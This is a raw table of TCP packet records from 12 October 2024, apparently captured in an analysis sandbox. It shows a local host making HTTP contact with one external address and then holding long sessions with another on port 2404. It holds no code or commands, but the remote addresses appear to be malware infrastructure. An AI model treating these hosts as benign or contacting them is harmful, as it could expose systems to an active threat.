Oct 12, 2024 16:39:57.893996000 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894002914 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894017935 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894025087 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894038916 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894040108 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894040108 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894056082 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894058943 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894079924 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894081116 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894098997 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894109011 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894118071 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894121885 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894140959 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894141912 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894161940 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894164085 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894181013 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894184113 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894197941 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894201994 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894222021 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894224882 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894241095 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894248009 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894263029 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894263983 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894277096 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894283056 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.894310951 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.894319057 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:58.940135002 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:40:00.029484034 CEST	80	49169	104.168.7.25	192.168.2.22
Oct 12, 2024 16:40:00.029706955 CEST	49169	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:40:01.816705942 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:01.821715117 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:01.821789026 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:01.835572004 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:01.840750933 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.317919016 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.451214075 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.455454111 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.483292103 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.488054991 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.491604090 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.496576071 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.497721910 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.502582073 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.502652884 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.507514954 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.669639111 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.678883076 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.683729887 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.826550961 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.963604927 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.963824987 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.968218088 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.973017931 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:02.973114014 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.982873917 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:02.988949060 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.069430113 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:40:03.074429989 CEST	80	49173	178.237.33.50	192.168.2.22
Oct 12, 2024 16:40:03.074502945 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:40:03.074881077 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:40:03.079706907 CEST	80	49173	178.237.33.50	192.168.2.22
Oct 12, 2024 16:40:03.453098059 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.589782953 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.589922905 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.628504038 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.633441925 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.633502007 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.638314009 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.638362885 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.643184900 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.717297077 CEST	80	49173	178.237.33.50	192.168.2.22
Oct 12, 2024 16:40:03.717468023 CEST	49173	80	192.168.2.22	178.237.33.50
Oct 12, 2024 16:40:03.767057896 CEST	49171	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.772058010 CEST	2404	49171	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800260067 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800290108 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800304890 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800321102 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800335884 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.800365925 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800381899 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800400019 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.800401926 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800424099 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800431967 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.800445080 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800462008 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800477982 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.800478935 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800503016 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.800528049 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.800550938 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.800601959 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.805691004 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.898533106 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.898561001 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.898576021 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.898603916 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.898636103 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.899591923 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.899703026 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.899717093 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.899748087 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.899786949 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.899802923 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.899818897 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.899831057 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.899836063 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.899859905 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.900516033 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.900532007 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.900548935 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.900563955 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.900573969 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.900605917 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.901025057 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.901077986 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.901102066 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.901119947 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.901123047 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.901137114 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.901160955 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.903511047 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.903527021 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.903543949 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.903564930 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.903568029 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.903584003 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.903606892 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.903613091 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.903655052 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.904007912 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.904021978 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.904062033 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.937422037 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:03.999946117 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:03.999995947 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.000010967 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.000039101 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.000055075 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.000056028 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.000073910 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.000076056 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.000114918 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.002512932 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002563000 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002578020 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002612114 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.002638102 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002655983 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002681017 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.002717972 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002736092 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002757072 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.002809048 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002825022 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002840996 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002849102 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.002856016 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.002878904 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.003097057 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003123999 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003137112 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.003139019 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003175020 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.003281116 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003298044 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003324986 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003336906 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.003341913 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003359079 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003376961 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.003592968 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003634930 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.003693104 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003709078 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003725052 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003741026 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003748894 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.003758907 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003777027 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003778934 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.003813982 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.003829956 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003849030 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003863096 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.003885031 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.004298925 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004338980 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.004364014 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004381895 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004415989 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.004453897 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004472017 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004488945 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004503965 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004508972 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.004538059 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.004734993 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004751921 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004767895 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004782915 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.004790068 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.004818916 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.005081892 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.005135059 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.005172968 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.005208969 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.005225897 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.005242109 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.005259037 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.005281925 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.005294085 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.005409002 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.088856936 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.088880062 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.088907957 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.088924885 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.088928938 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.088943005 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.088960886 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.088963985 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.088983059 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.089000940 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.089010000 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.089019060 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.089039087 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.089040041 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.089082956 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.091198921 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091227055 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091243029 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091272116 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.091346025 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091401100 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.091453075 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091468096 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091485977 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091504097 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091506958 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.091540098 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.091633081 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091651917 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091666937 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091681957 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091697931 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091706038 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.091712952 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091726065 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.091730118 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091747046 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.091749907 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.091784000 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.092164993 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092180014 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092196941 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092211008 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092216969 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.092228889 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092248917 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.092462063 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092478037 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092493057 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092508078 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.092529058 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.092535019 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092551947 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092566967 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092586040 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.092909098 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092928886 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092943907 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092957020 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.092957973 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.092981100 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.093000889 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093024015 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093039036 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093044996 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.093055964 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093070030 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093080044 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.093086004 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093101978 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093111038 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.093120098 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093137026 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093149900 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.093178988 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.093835115 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093851089 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093871117 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093894005 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093897104 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.093909025 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093924999 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093938112 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.093940973 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093956947 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.093966007 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.093997002 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.094460964 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096189022 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096204996 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096220016 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096234083 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096242905 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096257925 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096273899 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096278906 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096290112 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096309900 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096318007 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096327066 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096342087 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096348047 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096359015 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096374035 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096379995 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096391916 CEST	2404	49172	107.173.4.16	192.168.2.22
